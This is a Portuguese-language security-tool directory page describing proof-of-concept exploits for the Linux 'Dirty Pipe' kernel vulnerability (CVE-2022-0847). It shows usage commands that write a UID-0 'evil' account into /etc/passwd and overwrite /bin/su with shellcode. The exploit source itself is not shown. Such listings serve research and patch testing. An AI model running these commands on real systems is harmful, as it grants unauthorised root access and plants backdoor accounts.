Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Dirty-Pipe-CVE-2022-0847-POCs — Exploits de prova de conceito para a vulnerabilidade CVE-2022-0847 (Dirty Pipe) do kernel Linux, demonstrando escalada de privilégio local via sobrescrita de binário SUID e injeção de shellcode. | Kitploit
Ferramentas/GitHubGitHub/ajith737/dirty-pipe-cve-2022-0847-pocs
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoAprendizado e EducaçãoExploração de Binários
GitHubajith737/dirty-pipe-cve-2022-0847-pocs

Dirty-Pipe-CVE-2022-0847-POCs

Exploits de prova de conceito para a vulnerabilidade CVE-2022-0847 (Dirty Pipe) do kernel Linux, demonstrando escalada de privilégio local via sobrescrita de binário SUID e injeção de shellcode.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
3há 3 anosAinda não revisado

Dirty-Pipe-CVE-2022-0847-POCs

  • Autor: Max Kellermann [email protected]
  • Contribuidor: Bl4sty https://twitter.com/bl4sty Uma nova vulnerabilidade do Linux conhecida como 'Dirty Pipe' permite que usuários locais obtenham privilégios de root através de explorações publicamente disponíveis.

Hoje, o pesquisador de segurança Max Kellermann divulgou de forma responsável a vulnerabilidade 'Dirty Pipe' e afirmou que ela afeta o Linux Kernel 5.8 e versões posteriores, até mesmo em dispositivos Android.

A vulnerabilidade é rastreada como CVE-2022-0847 e permite que um usuário sem privilégios injete e sobrescreva dados em arquivos somente leitura, incluindo processos SUID que são executados como root.

Kellerman descobriu o bug após rastrear um bug que estava corrompendo logs de acesso do servidor web de um de seus clientes.

Então Bl4sty escreveu outra versão. Em vez de sobrescrever um arquivo como /etc/passwd, ela sobrescreve um binário SUID especificado pelo usuário (como /bin/su), injetando shellcode que é então executado com permissões de usuário privilegiado (ou seja, root).

Exploit 1

root@kitploit:~
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC1.c -o exploit1 
┌──(ghost㉿uchiha)-[~]
└─$./exploit1 /etc/passwd 189 'evil:$6$USR$aNQSBWd3Bdn4Eo8ZaAjBBXW7M3CM7NnW3vX0Ulrei18dDifAiS0pB2iqCxVCK0nCKfRjdCSqgKHagkul6JEHT/:0:0::/root:/bin/bash
'

Exploit 2

root@kitploit:~
┌──(ghost㉿uchiha)-[~]
└─$gcc PoC2.c -o exploit2
┌──(ghost㉿uchiha)-[~]
└─$./exploit2 /bin/su

Para uso detalhado, consulte: https://medium.com/@ajithcrajendran/cve-2022-0847-dirty-pipe-a5d68f422dcf

Baixar ferramenta